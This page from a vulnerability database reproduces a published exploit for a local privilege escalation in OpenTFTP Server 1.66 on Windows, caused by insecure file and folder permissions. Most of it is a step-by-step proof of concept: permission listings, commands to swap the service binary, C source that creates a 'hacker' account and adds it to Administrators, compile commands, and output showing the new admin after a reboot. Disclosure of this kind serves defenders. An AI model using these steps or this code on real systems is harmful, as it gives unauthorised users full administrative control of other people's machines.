Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

OpenTFTP 1.66 - Local Privilege Escalation Vulnerability

🗓️ 13 Feb 2020 00:00:00Reported by bokuType 
zdt
 zdt🔗 0day.today👁 61 Views

OpenTFTP 1.66 Local Privilege Escalation Vulnerability. Insecure file & folder permissions allow low-privilege attacker to replace service binary for admin control

Code
# Exploit Title:   OpenTFTP 1.66 - Local Privilege Escalation
# Exploit Author:  boku
# Vendor Homepage: https://sourceforge.net/projects/tftp-server/
# Software Link:   https://sourceforge.net/projects/tftp-server/files/tftp%20server%20single%20port/OpenTFTPServerSPInstallerV1.66.exe/download
# Version:         1.66
# Tested On:       Windows 10 (32-bit)

# About:           
# "MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges, 
# Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available." 
# Downloads: 43,284 This Week - https://sourceforge.net/projects/tftp-server/

# Vulnerability Details:
# On Windows, Open TFTP Server v1.66, suffers from insecure file & folder permissions. 
# This allows a low-privilge, local attacker to escalate their permissions to Administrator; 
# by replacing the 'TFTPServer' service binary with a maliciously-crafted, binary executable. 
# The TFTP Server runs as an 'Auto_Start' Service, with 'LocalSystem' priviledges, after the 
# default installation. After the attacker has planted the malicious binary, the code will 
# be executed with System priviledges on the next boot of the windows device. See PoC below for details.

## Service Information (there is also an Unquoted Service Path)
C:\>sc qc TFTPServer
SERVICE_NAME: TFTPServer
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\OpenTFTPServer\OpenTFTPServerSP.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Open TFTP Single Port Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

## Insecure Folder Permission
C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F
                  NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                  BUILTIN\Users:(OI)(CI)(ID)R
                  NT AUTHORITY\Authenticated Users:(ID)C
                  NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

## Insecure File/Service Permission
C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F)
                                       NT AUTHORITY\SYSTEM:(I)(F)
                                       BUILTIN\Users:(I)(RX)
                                       NT AUTHORITY\Authenticated Users:(I)(M)

## Local Privilege Escalation Proof of Concept
#0.  Download & install Open TFTP Server v1.66

#1.  Create low privileged user & change to the user
  C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full"
  User name                    lowPrivUser
  Local Group Memberships      *Users
  Global Group memberships     *None
  C:\>whoami
  mycomputer\lowprivuser 

#2.  Move the Service EXE to a new name
  C:\OpenTFTPServer>move OpenTFTPServerSP.exe ~OpenTFTPServerSP.exe
        1 file(s) moved.

#3.  Create malicious binary on kali linux
  1) Download dependencies
   [email protected]# apt install gcc-mingw-w64-i686 wine64 -y
  2) Add Admin User C Code
   [email protected]# cat addAdmin.c
   #include<windows.h>
   int main(void){
    system("net user hacker mypassword /add");
    system("net localgroup Administrators hacker /add");
    WinExec("C:\\OpenTFTPServer\\~OpenTFTPServerSP.exe",0);
    return 0;
   }
  3) Compile Code
   [email protected]# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o OpenTFTPServerSP.exe

#4. Transfer created 'OpenTFTPServerSP.exe' to the Windows Host 

#5. Move the created 'OpenTFTPServerSP.exe' binary to the 'C:\OpenTFTPServer\' Folder
  C:\>move C:\Users\lowPrivUser\Desktop\OpenTFTPServerSP.exe C:\OpenTFTPServer\
        1 file(s) moved.
  C:\>dir C:\OpenTFTPServer | findstr "OpenTFTPServerSP.exe"
  02/12/2020  05:59 PM           288,659 OpenTFTPServerSP.exe
  02/12/2020  06:38 PM           221,560 ~OpenTFTPServerSP.exe

#6. Reboot the Computer

#7. Look at that new Admin
  C:\Users\lowPrivUser>net users hacker | findstr "Local name active"
  User name                    hacker
  Account active               Yes
  Local Group Memberships      *Administrators       *Users

  C:\Users\lowPrivUser>net localgroup Administrators
  Alias name     Administrators
  Comment        Administrators have complete and unrestricted access to the computer/domain

  Members
  -------------------------------------------------------------------------------
  Administrator
  boku
  hacker

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Feb 2020 00:00Current
0.6Low risk
Vulners AI Score0.6
opentftp serverprivilege escalationwindows securityfile permissionsservice vulnerabilitylocal attack
61